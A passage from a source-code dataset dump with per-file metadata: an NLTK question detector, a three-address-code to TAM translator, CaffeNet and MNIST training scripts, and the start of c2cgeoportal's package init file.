| 28.244898 | 77 | 0.533237 | 188 | 1,384 | 3.925532 | 0.414894 | 0.03252 | 0.03252 | 0.04336 | 0.204607 | 0.143631 | 0.143631 | 0.143631 | 0.143631 | 0.143631 | 0 | 0.022893 | 0.305636 | 1,384 | 48 | 78 | 28.833333 | 0.745057 | 0.134393 | 0 | 0.225 | 0 | 0 | 0.257485 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025 | false | 0 | 0 | 0 | 0.05 | 0.075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ea6772e802a782c50f83515c19392b32fbb9402 | 779 | py | Python | Backend/ChatBot/question detection.py | paucutrina/RareHacks_Chatbot | c7ecfef693bf2f477d090629d6eecf7b0bf57872 | [
"MIT"
] | null | null | null | Backend/ChatBot/question detection.py | paucutrina/RareHacks_Chatbot | c7ecfef693bf2f477d090629d6eecf7b0bf57872 | [
"MIT"
] | null | null | null | Backend/ChatBot/question detection.py | paucutrina/RareHacks_Chatbot | c7ecfef693bf2f477d090629d6eecf7b0bf57872 | [
"MIT"
] | null | null | null | from nltk import sent_tokenize, word_tokenize, pos_tag, ne_chunk
sentence = 'Usually I go to the hospital when I am afraid. When I sould go there?'
sentences_splitted = sent_tokenize(sentence)
sentence_words_splitted = [word_tokenize(s) for s in sentences_splitted]
question = [ne_chunk(pos_tag(s)) for s in sentences_splitted]
labeled_sentence = []
helping_verbs = ['is', 'am', 'are', 'was', 'were', 'be', 'being', 'been', 'has', 'have', 'had', 'do', 'does', 'did',
'will', 'shall', 'should', 'would']
for sentence in sentence_words_splitted:
if 'wh' in sentence[0] or '?' in sentence[-1] or sentence[0] in helping_verbs: # First word is where, when, which, who, what... and not helping verbs in the first word
labeled_sentence.append(sentence)
| 51.933333 | 172 | 0.69448 | 117 | 779 | 4.461538 | 0.529915 | 0.097701 | 0.08046 | 0.02682 | 0.091954 | 0.091954 | 0 | 0 | 0 | 0 | 0 | 0.00463 | 0.168164 | 779 | 14 | 173 | 55.642857 | 0.800926 | 0.110398 | 0 | 0 | 0 | 0 | 0.197101 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ea86f5c1066313076da8b4f11d85883b0f7d98c | 16,079 | py | Python | tp4/src/back-end/translator.py | ha2398/compiladores1-tps | a70de7cbb6a76301258f1e0f88141a57c6a15d5e | [
"MIT"
] | null | null | null | tp4/src/back-end/translator.py | ha2398/compiladores1-tps | a70de7cbb6a76301258f1e0f88141a57c6a15d5e | [
"MIT"
] | null | null | null | tp4/src/back-end/translator.py | ha2398/compiladores1-tps | a70de7cbb6a76301258f1e0f88141a57c6a15d5e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
'''
translator.py: 3 address code -> TAM translator.
@author: Hugo Araujo de Sousa [2013007463]
@email: hugosousa@dcc.ufmg.br
@DCC053 - Compiladores I - UFMG
'''
# TODO: Need to handle floating point literals.
# TAM does not provide arithmetic routines for floating point!?
import argparse as ap
from quadruple import Quadruple
from math import floor
# Global variables.
input_file = None
output_file = None
# Sizes (in 2B words) of the grammar types.
TSIZES = {'int': 2, 'float': 4, 'char': 1, 'bool': 1}
MAX_SIZE = TSIZES['float']
# Stack top
ST = 0
# Code stack top
CT = 0
# Address, on the stack, of the variables.
addresses = {}
# Types of the variables.
types = {}
# Dictionary which returns the Quadruple by label.
labels = {}
# Instruction format
INSTR = '{}\t{}\t{}\t{}\t; {}\n'
# Instruction buffer
INSTR_BUFFER = []
################################################################################
def str2bool(string):
''' Converts a string to bool.
@param string: String to be converted.
@type string: String.
@return: Boolean that represents the string.
@rtype: Bool.
'''
return string.lower() == 'true'
def parse_arguments():
''' Add command line arguments to the program.
@return: Command line arguments.
@rtype: argparse.Namespace.
'''
parser = ap.ArgumentParser()
parser.add_argument('INPUT_FILE', type=str, help='Name of input file')
parser.add_argument('OUTPUT_FILE', type=str, help='Name of output file')
return parser.parse_args()
def add_instr(instr, quad):
''' Print instruction to output file.
@param instr: Instruction to print.
@type instr: String.
@param quad: Quadruple that generated the instruction.
@type quad: Quadruple.
'''
global CT
INSTR_BUFFER.append((instr, quad))
CT += 1
def read_decls():
''' Read the program's declarations.
'''
global ST, CT
print('-------------------BEGIN INPUT-------------------')
while True:
line = input_file.readline()
print(line.strip('\n'))
if len(line) <= 2:
break
else:
line = line.replace('[', '')
line = line.replace(']', '')
args = line.split()
if len(args) < 3: # Simple variable
if args[1] not in addresses:
size = TSIZES[args[0]]
addresses[args[1]] = ST
ST += size
types[args[1]] = args[0]
else: # Array
if args[2] not in addresses:
size = TSIZES[args[1]] * int(args[0])
addresses[args[2]] = ST
ST += size
types[args[2]] = args[1]
add_instr(INSTR.format(10, 0, 0, size, 'PUSH ' + str(size)), None)
def build_quadruples():
''' Build quadruples from the isntruction in the source code.
@return quads: Quadruples built.
@rtype quads: List of Quadruple.
'''
global CT, ST
quads = []
for line in input_file: # Get all quadruples in source code
print(line.strip('\n'))
newQuad = None
line_args = line.split()
L = []
if ':' in line_args[0]: # Collect Quadruple labels
L = [int(x[1:]) for x in line_args[0].split(':') if x != '']
del line_args[0]
if len(line_args) != 0: # Non empty quadruples
if 'if' in line_args[0]: # Conditional
op = line_args[0]
if len(line_args) == 6:
cond = line_args[1:4]
else:
cond = line_args[1:2]
branch = int(line_args[-1][1:])
newQuad = Quadruple(None, cond, None, op, branch)
elif 'goto' == line_args[0]: # Unconditional jump
branch = int(line_args[1][1:])
newQuad = Quadruple(None, None, None, line_args[0], branch)
else: # Operation
dst = line_args[0]
if dst not in addresses: # Allocate memory for temporaries
addresses[dst] = ST
ST += MAX_SIZE
types[dst] = 'float'
add_instr(INSTR.format(10, 0, 0, MAX_SIZE,
'PUSH ' + str(MAX_SIZE)), None)
# Get operator and operands
if line_args[1] == '[': # Array indexing l-value
op = '[]='
op1 = line_args[2]
op2 = line_args[5]
newQuad = Quadruple(dst, op1, op2, op)
else:
if len(line_args) == 3: # Simple copy assignments
op1 = line_args[2]
newQuad = Quadruple(dst, op1, None, None)
elif len(line_args) == 5: # Arithmetic
op = line_args[3]
op1 = line_args[2]
op2 = line_args[4]
newQuad = Quadruple(dst, op1, op2, op)
elif len(line_args) == 6: # Array indexing r-value
op = '=[]'
op1 = line_args[2]
op2 = line_args[4]
newQuad = Quadruple(dst, op1, op2, op)
else: # Unary
op = line_args[2]
op2 = line_args[3]
newQuad = Quadruple(dst, None, op2, op)
if newQuad:
quads.append(newQuad)
for label in L: # Each label points to their proper quadruple
labels[label] = newQuad
print('--------------------END INPUT--------------------')
return quads
def translate(quads):
''' Translate quadruples to TAM code.
Types of quadruples:
1. Conditional jump.
2. Unconditional jump.
3. Array indexing l-value assignment.
4. Array indexing r-value assignment.
5. Simple variable copy assignments.
6. Arithmetic assignment.
7. Unary assignment.
@param quads: Quadruples to translate.
@type quads: List of Quadruple.
'''
for quad in quads:
quad.address = CT
quad_type = quad.type
if quad_type == 1: # Conditional jump.
# Push the condition bool value to stack.
cond = quad.op1
if len(cond) == 3: # Relational operation
if cond[0] in addresses: # Operand is variable
addr_op1 = addresses[cond[0]]
op1_size = TSIZES[types[cond[0]]]
add_instr(INSTR.format(1, 4, 0, addr_op1,
'LOADA ' + str(addr_op1) + '[SB]'), quad)
add_instr(INSTR.format(2, 0, op1_size, 0,
'LOADI(' + str(op1_size) + ')'), quad)
else: # Operand is not variable
if cond[0] == 'true' or cond[0] == 'false':
literal = int(str2bool(cond[0]))
else:
literal = int(floor(float(cond[0])))
add_instr(INSTR.format(3, 0, 0, literal,
'LOADL ' + str(literal)), quad)
if cond[2] in addresses: # Operand is variable
addr_op1 = addresses[cond[2]]
op1_size = TSIZES[types[cond[2]]]
add_instr(INSTR.format(1, 4, 0, addr_op1,
'LOADA ' + str(addr_op1) + '[SB]'), quad)
add_instr(INSTR.format(2, 0, op1_size, 0,
'LOADI(' + str(op1_size) + ')'), quad)
else: # Operand is not variable
if cond[2] == 'true' or cond[2] == 'false':
literal = int(str2bool(cond[2]))
else:
literal = int(floor(float(cond[2])))
add_instr(INSTR.format(3, 0, 0, literal,
'LOADL ' + str(literal)), quad)
# Perform comparison
relop = cond[1]
if relop == '<':
mnemo = 'lt'
d = 13
add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
elif relop == '<=':
mnemo = 'le'
d = 14
add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
elif relop == '>=':
mnemo = 'ge'
d = 15
add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
elif relop == '>':
mnemo = 'gt'
d = 16
add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
else:
# Push operators size.
op_size = TSIZES[types[cond[0]]]
add_instr(INSTR.format(3, 0, 0, op_size,
'LOADL ' + str(op_size)), quad)
if relop == '==':
mnemo = 'eq'
d = 17
add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
else: # !=
mnemo = 'ne'
d = 18
add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
else: # Simple boolean
if cond[0] in addresses: # Operand is variable
addr_op1 = addresses[cond[0]]
op1_size = TSIZES[types[cond[0]]]
add_instr(INSTR.format(1, 4, 0, addr_op1,
'LOADA ' + str(addr_op1) + '[SB]'), quad)
add_instr(INSTR.format(2, 0, op1_size, 0,
'LOADI(' + str(op1_size) + ')'), quad)
else: # Operand is not variable
if cond[0] == 'true' or cond[0] == 'false':
literal = int(str2bool(cond[0]))
else:
literal = int(floor(float(cond[0])))
add_instr(INSTR.format(3, 0, 0, literal,
'LOADL ' + str(literal)), quad)
# Jump to label according to result
n = 1 if quad.operator == 'if' else 0
add_instr(INSTR.format(14, 0, n, '{}',
'JUMPIF(' + str(n) + ') {}[CB]'), quad)
elif quad_type == 2: # Unconditional jump.
add_instr(INSTR.format(12, 0, 0, '{}', 'JUMP {}[CB]'), quad)
elif quad_type == 3: # Array indexing l-value assignment.
if quad.op2 in addresses: # Operand 2 is variable
addr_op2 = addresses[quad.op2]
op2_size = TSIZES[types[quad.op2]]
add_instr(INSTR.format(1, 4, 0, addr_op2,
'LOADA ' + str(addr_op2) + '[SB]'), quad)
add_instr(INSTR.format(2, 0, op2_size, 0,
'LOADI(' + str(op2_size) + ')'), quad)
else: # Operand 2 is literal
if quad.op2 == 'true' or quad.op2 == 'false':
literal = int(str2bool(quad.op2))
else:
literal = int(floor(float(quad.op2)))
add_instr(INSTR.format(3, 0, 0, literal,
'LOADL ' + str(literal)), quad)
# Get array element address with offset.
# 1. Push offset to stack
if quad.op1 in addresses: # Operand is variable
addr_op1 = addresses[quad.op1]
op1_size = TSIZES[types[quad.op1]]
add_instr(INSTR.format(1, 4, 0, addr_op1,
'LOADA ' + str(addr_op1) + '[SB]'), quad)
add_instr(INSTR.format(2, 0, op1_size, 0,
'LOADI(' + str(op1_size) + ')'), quad)
else: # Operand is not variable
if quad.op1 == 'true' or quad.op1 == 'false':
literal = int(str2bool(quad.op1))
else:
literal = int(floor(float(quad.op1)))
add_instr(INSTR.format(3, 0, 0, literal,
'LOADL ' + str(literal)), quad)
# 2. Push base address to stack
addr_base = addresses[quad.dst]
add_instr(INSTR.format(1, 4, 0, addr_base,
'LOADA ' + str(addr_base) + '[SB]'), quad)
# 3. Add them up.
mnemo = 'add'
d = 8
add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
# 4. Store r-value in that address.
dst_size = TSIZES[types[quad.dst]]
add_instr(INSTR.format(5, 0, dst_size, 0,
'STOREI(' + str(dst_size) + ')'), quad)
elif quad_type == 4: # Array indexing r-value assignment.
# Get array element address with offset.
# 1. Push offset to stack
if quad.op2 in addresses: # Operand is variable
addr_op2 = addresses[quad.op2]
op2_size = TSIZES[types[quad.op2]]
add_instr(INSTR.format(1, 4, 0, addr_op2,
'LOADA ' + str(addr_op2) + '[SB]'), quad)
add_instr(INSTR.format(2, 0, op1_size, 0,
'LOADI(' + str(op2_size) + ')'), quad)
else: # Operand is not variable
if quad.op2 == 'true' or quad.op2 == 'false':
literal = int(str2bool(quad.op2))
else:
literal = int(floor(float(quad.op2)))
add_instr(INSTR.format(3, 0, 0, literal,
'LOADL ' + str(literal)), quad)
# 2. Push base address to stack
addr_base = addresses[quad.op1]
add_instr(INSTR.format(1, 4, 0, addr_base,
'LOADA ' + str(addr_base) + '[SB]'), quad)
# 3. Add them up.
mnemo = 'add'
d = 8
add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
# 4. Get r-value
op_size = TSIZES[types[quad.op1]]
add_instr(INSTR.format(2, 0, op_size, 0,
'LOADI(' + str(op_size) + ')'), quad)
# Push destination address onto stack and store r-value there.
addr_dst = addresses[quad.dst]
dst_size = TSIZES[types[quad.dst]]
add_instr(INSTR.format(1, 4, 0, addr_dst,
'LOADA ' + str(addr_dst) + '[SB]'), quad)
add_instr(INSTR.format(5, 0, dst_size, 0,
'STOREI(' + str(dst_size) + ')'), quad)
elif quad_type == 5: # Simple variable copy assignments.
if quad.op1 in addresses: # Operand is variable
addr_op1 = addresses[quad.op1]
op1_size = TSIZES[types[quad.op1]]
add_instr(INSTR.format(1, 4, 0, addr_op1,
'LOADA ' + str(addr_op1) + '[SB]'), quad)
add_instr(INSTR.format(2, 0, op1_size, 0,
'LOADI(' + str(op1_size) + ')'), quad)
else: # Operand is not variable
if quad.op1 == 'true' or quad.op1 == 'false':
literal = int(str2bool(quad.op1))
else:
literal = int(floor(float(quad.op1)))
add_instr(INSTR.format(3, 0, 0, literal,
'LOADL ' + str(literal)), quad)
addr_dst = addresses[quad.dst]
dst_size = TSIZES[types[quad.dst]]
add_instr(INSTR.format(1, 4, 0, addr_dst,
'LOADA ' + str(addr_dst) + '[SB]'), quad)
add_instr(INSTR.format(5, 0, dst_size, 0,
'STOREI(' + str(dst_size) + ')'), quad)
elif quad_type == 6: # Arithmetic assignment.
addr_dst = addresses[quad.dst]
dst_size = TSIZES[types[quad.dst]]
if quad.op1 in addresses: # Operand 1 is variable
addr_op1 = addresses[quad.op1]
op1_size = TSIZES[types[quad.op1]]
add_instr(INSTR.format(1, 4, 0, addr_op1,
'LOADA ' + str(addr_op1) + '[SB]'), quad)
add_instr(INSTR.format(2, 0, op1_size, 0,
'LOADI(' + str(op1_size) + ')'), quad)
else: # Operand 1 is literal
if quad.op1 == 'true' or quad.op1 == 'false':
literal = int(str2bool(quad.op1))
else:
literal = int(floor(float(quad.op1)))
add_instr(INSTR.format(3, 0, 0, literal,
'LOADL ' + str(literal)), quad)
if quad.op2 in addresses: # Operand 2 is variable
addr_op2 = addresses[quad.op2]
op2_size = TSIZES[types[quad.op2]]
add_instr(INSTR.format(1, 4, 0, addr_op2,
'LOADA ' + str(addr_op2) + '[SB]'), quad)
add_instr(INSTR.format(2, 0, op2_size, 0,
'LOADI(' + str(op2_size) + ')'), quad)
else: # Operand 2 is literal
if quad.op2 == 'true' or quad.op2 == 'false':
literal = int(str2bool(quad.op2))
else:
literal = int(floor(float(quad.op2)))
add_instr(INSTR.format(3, 0, 0, literal,
'LOADL ' + str(literal)), quad)
# Perform operation
if quad.operator == '+':
mnemo = 'add'
d = 8
elif quad.operator == '-':
mnemo = 'sub'
d = 9
elif quad.operator == '*':
mnemo = 'mult'
d = 10
else:
mnemo = 'div'
d = 11
add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
add_instr(INSTR.format(1, 4, 0, addr_dst,
'LOADA ' + str(addr_dst) + '[SB]'), quad)
add_instr(INSTR.format(5, 0, dst_size, 0,
'STOREI(' + str(dst_size) + ')'), quad)
elif quad_type == 7: # Unary assignment.
addr_dst = addresses[quad.dst]
dst_size = TSIZES[types[quad.dst]]
add_instr(INSTR.format(3, 0, 0, 0,
'LOADL 0'), quad)
if quad.op2 in addresses: # Operand 2 is variable
addr_op2 = addresses[quad.op2]
op2_size = TSIZES[types[quad.op2]]
add_instr(INSTR.format(1, 4, 0, addr_op2,
'LOADA ' + str(addr_op2) + '[SB]'), quad)
add_instr(INSTR.format(2, 0, op2_size, 0,
'LOADI(' + str(op2_size) + ')'), quad)
else: # Operand 2 is literal
if quad.op2 == 'true' or quad.op2 == 'false':
literal = int(str2bool(quad.op2))
else:
literal = int(floor(float(quad.op2)))
add_instr(INSTR.format(3, 0, 0, literal,
'LOADL ' + str(literal)), quad)
# Perform operation
d = 9
mnemo = 'sub'
add_instr(INSTR.format(6, 2, 0, d, mnemo), quad)
add_instr(INSTR.format(1, 4, 0, addr_dst,
'LOADA ' + str(addr_dst) + '[SB]'), quad)
add_instr(INSTR.format(5, 0, dst_size, 0,
'STOREI(' + str(dst_size) + ')'), quad)
add_instr(INSTR.format(15, 0, 0, 0, 'HALT'), None)
def backpatching():
''' Perform backpatching to assign labels. '''
for i in range(len(INSTR_BUFFER)):
instruction = INSTR_BUFFER[i][0]
quadruple = INSTR_BUFFER[i][1]
if '{}' in instruction:
branch_label = quadruple.branch
branch_quadruple = labels[branch_label]
if branch_quadruple == None:
branch_address = CT
else:
branch_address = branch_quadruple.address
INSTR_BUFFER[i] = \
(instruction.format(branch_address, branch_address), quadruple)
def finish():
''' Finishes translation. '''
input_file.close()
for (instr, quad) in INSTR_BUFFER:
output_file.write(instr)
output_file.close()
def main():
global input_file, output_file
args = parse_arguments()
input_file = open(args.INPUT_FILE, 'r')
output_file = open(args.OUTPUT_FILE, 'w')
read_decls()
quads = build_quadruples()
translate(quads)
backpatching()
finish()
################################################################################
main()
| 26.57686 | 80 | 0.602525 | 2,320 | 16,079 | 4.072414 | 0.109914 | 0.050804 | 0.082557 | 0.118649 | 0.600021 | 0.574619 | 0.540538 | 0.52699 | 0.52699 | 0.497248 | 0 | 0.038027 | 0.229678 | 16,079 | 604 | 81 | 26.620861 | 0.72477 | 0.193296 | 0 | 0.540052 | 0 | 0 | 0.060002 | 0.007539 | 0 | 0 | 0 | 0.001656 | 0 | 1 | 0.023256 | false | 0 | 0.007752 | 0 | 0.03876 | 0.010336 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eab3a16c60da45c7e9e2c9740482835876404d6 | 2,501 | py | Python | CaffeNet/caffenet_settings.py | MasazI/DeepLearning_TensorFlow | 6a0865850b32eb4af52bc41984e0cbaa2a19c48a | [
"MIT"
] | 17 | 2015-12-20T14:10:35.000Z | 2022-02-28T13:06:33.000Z | CaffeNet/caffenet_settings.py | MasazI/DeepLearning_TensorFlow | 6a0865850b32eb4af52bc41984e0cbaa2a19c48a | [
"MIT"
] | 1 | 2019-02-20T12:37:56.000Z | 2019-02-20T12:37:56.000Z | CaffeNet/caffenet_settings.py | MasazI/DeepLearning_TensorFlow | 6a0865850b32eb4af52bc41984e0cbaa2a19c48a | [
"MIT"
] | 8 | 2015-11-14T04:32:10.000Z | 2020-12-26T01:12:18.000Z | # encoding: utf-8
import tensorflow as tf
flags = tf.app.flags
FLAGS = flags.FLAGS
# train settings
flags.DEFINE_integer('batch_size', 40, 'the number of images in a batch.')
flags.DEFINE_integer('training_data_type', 1, '0: directly feed, 1: tfrecords')
#flags.DEFINE_string('train_tfrecords', 'data/train_caltech_random.tfrecords', 'path to tfrecords file for train.')
flags.DEFINE_string('train_tfrecords', 'data/train_ex_norm.tfrecords', 'path to tfrecords file for train.')
flags.DEFINE_integer('image_height', 256, 'image height.')
flags.DEFINE_integer('image_width', 256, 'image width.')
flags.DEFINE_integer('image_depth', 3, 'image depth.')
flags.DEFINE_integer('crop_size', 227, 'crop size of image.')
flags.DEFINE_float('learning_rate', 1e-2, 'initial learning rate.')
flags.DEFINE_float('learning_rate_decay_factor', 0.1, 'learning rate decay factor.')
flags.DEFINE_float('num_epochs_per_decay', 350.0, 'epochs after which learning rate decays.')
flags.DEFINE_float('moving_average_decay', 0.9999, 'decay to use for the moving averate.')
flags.DEFINE_integer('num_examples_per_epoch_for_train', 400, 'the number of examples per epoch train.')
flags.DEFINE_integer('num_examples_per_epoch_for_eval', 400, 'the number of examples per eposh eval.')
flags.DEFINE_string('tower_name', 'tower', 'multiple GPU prefix.')
#flags.DEFINE_integer('num_classes', 10, 'the number of classes.')
flags.DEFINE_integer('num_classes', 5, 'the number of classes.')
flags.DEFINE_integer('num_threads', 8, 'the number of threads.')
flags.DEFINE_boolean('fine_tuning', False, 'fine tuning.')
flags.DEFINE_string('trained_model', 'trained_model/caffenet.npy' , 'trained model to use fine tuning.')
# output logs settings
flags.DEFINE_string('train_dir', 'train', 'directory where to write even logs and checkpoint')
flags.DEFINE_integer('max_steps', 100000, 'the number of batches to run.')
flags.DEFINE_boolean('log_device_placement', False, 'where to log device placement.')
# evaluate settings
flags.DEFINE_string('eval_dir', 'eval', 'directory where to write event logs.')
flags.DEFINE_string('eval_tfrecords', 'data/train_ex_norm.tfrecords', 'path to tfrecords file for eval')
flags.DEFINE_string('checkpoint_dir', 'train', 'directory where to read model checkpoints.')
flags.DEFINE_integer('eval_interval_secs', 60*3, 'How to often to run the eval.'),
flags.DEFINE_integer('num_examples', 100, 'the number of examples to run.')
flags.DEFINE_boolean('run_once', False, 'whether to run eval only once.')
| 59.547619 | 115 | 0.773291 | 378 | 2,501 | 4.902116 | 0.314815 | 0.172153 | 0.135996 | 0.067998 | 0.348624 | 0.233135 | 0.206152 | 0.178629 | 0.093362 | 0.059363 | 0 | 0.022497 | 0.093563 | 2,501 | 41 | 116 | 61 | 0.794883 | 0.09916 | 0 | 0 | 0 | 0 | 0.563224 | 0.076135 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.033333 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eab8b064c9e76464450980bd8d5e48a2c98df8b | 2,529 | py | Python | mnist_train.py | danielgolf/AI-playground | d1148da7a3ca42b788a7ba268d3367bca0803cb9 | [
"MIT"
] | null | null | null | mnist_train.py | danielgolf/AI-playground | d1148da7a3ca42b788a7ba268d3367bca0803cb9 | [
"MIT"
] | null | null | null | mnist_train.py | danielgolf/AI-playground | d1148da7a3ca42b788a7ba268d3367bca0803cb9 | [
"MIT"
] | null | null | null | import numpy as np
import keras
import keras.layers as layers
from get_mnist import get_mnist_preproc
### --- hyperparameterrs --- ###
epochs = 48
batch_size = 64
num_classes = 10
reg = 3e-3
### --- hyperparams end --- ###
### --- setup data --- ###
traini, trainl, vali, vall, testi, testl = get_mnist_preproc()
trainl = keras.utils.to_categorical(trainl, num_classes=None)
vall = keras.utils.to_categorical(vall, num_classes=None)
testl = keras.utils.to_categorical(testl, num_classes=None)
### --- end setup --- ###
### --- define model --- ###
model = keras.Sequential()
# TODO: regularzation
model.add(
layers.Conv2D(
input_shape=traini.shape[1:],
activation='relu',
filters=8,
kernel_size=3,
padding='same',
kernel_regularizer=keras.regularizers.l2(reg)
)
)
model.add(
layers.Conv2D(
activation='relu',
filters=8,
kernel_size=3,
padding='same',
kernel_regularizer=keras.regularizers.l2(reg)
)
)
model.add(
layers.MaxPooling2D(
pool_size=2
)
)
model.add(
layers.Conv2D(
activation='relu',
filters=8,
kernel_size=3,
padding='same',
kernel_regularizer=keras.regularizers.l2(reg)
)
)
model.add(
layers.Conv2D(
activation='relu',
filters=8,
kernel_size=3,
padding='same',
kernel_regularizer=keras.regularizers.l2(reg)
)
)
model.add(
layers.Flatten()
)
model.add(
layers.Dense(
num_classes,
activation='softmax',
kernel_regularizer=keras.regularizers.l2(reg)
)
)
### --- end definition --- ###
### --- training --- ###
model.compile(
optimizer='adam',
loss='categorical_crossentropy',
metrics=['accuracy']
)
# Score untrained model.
scores_untrained = model.evaluate(testi, testl, verbose=1)
history = model.fit(
traini, trainl,
epochs=epochs,
batch_size=batch_size,
validation_data=(vali, vall),
shuffle=True
)
print('Test loss untrained:', scores_untrained[0])
print('Test accuracy untrained:', scores_untrained[1])
# Score trained model.
scores = model.evaluate(testi, testl, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
### --- end training --- ###
### --- save model --- ###
model.summary()
json_string = model.to_json()
with open('./mnist/mnist_model.json', 'w') as file:
file.write(json_string + '\n')
model.save_weights('./mnist/mnist_weights.hdf5')
### --- end save --- ###
| 19.453846 | 62 | 0.627521 | 293 | 2,529 | 5.286689 | 0.331058 | 0.036152 | 0.063267 | 0.109748 | 0.336346 | 0.336346 | 0.271143 | 0.271143 | 0.271143 | 0.271143 | 0 | 0.01757 | 0.212337 | 2,529 | 129 | 63 | 19.604651 | 0.76004 | 0.109134 | 0 | 0.363636 | 0 | 0 | 0.08958 | 0.033821 | 0 | 0 | 0 | 0.007752 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.045455 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eaeba892f2de5df103a615e0e9a36e8ab22471a | 25,480 | py | Python | c2cgeoportal/__init__.py | kalbermattenm/c2cgeoportal | 4ab41ec7130536bc86f4c05ca330e9ce3dfb93c1 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | c2cgeoportal/__init__.py | kalbermattenm/c2cgeoportal | 4ab41ec7130536bc86f4c05ca330e9ce3dfb93c1 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | c2cgeoportal/__init__.py | kalbermattenm/c2cgeoportal | 4ab41ec7130536bc86f4c05ca330e9ce3dfb93c1 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2011-2016, Camptocamp SA
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import logging
import sqlalchemy
import sqlahelper
import pyramid_tm
import mimetypes
import c2c.template
from urlparse import urlsplit
import simplejson as json
from socket import gethostbyname, gaierror
from ipcalc import IP, Network
import importlib
from pyramid_mako import add_mako_renderer
from pyramid.interfaces import IStaticURLInfo
from pyramid.httpexceptions import HTTPException
from papyrus.renderers import GeoJSON, XSD
from c2cgeoportal import stats
from c2cgeoportal.resources import FAModels
from c2cgeoportal.lib import dbreflection, get_setting, caching, \
C2CPregenerator, MultiDomainStaticURLInfo
log = logging.getLogger(__name__)
# used by (sql|form)alchemy
srid = None
schema = None
parentschema = None
formalchemy_language = None
formalchemy_default_zoom = 10
formalchemy_default_x = 740000
formalchemy_default_y = 5860000
formalchemy_available_functionalities = []
formalchemy_available_metadata = []
# Header predicate to accept only JSON content
# OL/cgxp are not setting the correct content type for JSON. We have to accept
# XML as well even though JSON is actually send.
JSON_CONTENT_TYPE = "Content-Type:application/(?:json|xml)"
class DecimalJSON:
def __init__(self, jsonp_param_name="callback"):
self.jsonp_param_name = jsonp_param_name
def __call__(self, info):
def _render(value, system):
ret = json.dumps(value, use_decimal=True)
request = system.get("request")
if request is not None:
callback = request.params.get(self.jsonp_param_name)
if callback is None:
request.response.content_type = "application/json"
else:
request.response.content_type = "text/javascript"
ret = "%(callback)s(%(json)s);" % {
"callback": callback,
"json": ret
}
return ret
return _render
INTERFACE_TYPE_CGXP = "cgxp"
INTERFACE_TYPE_NGEO = "ngeo"
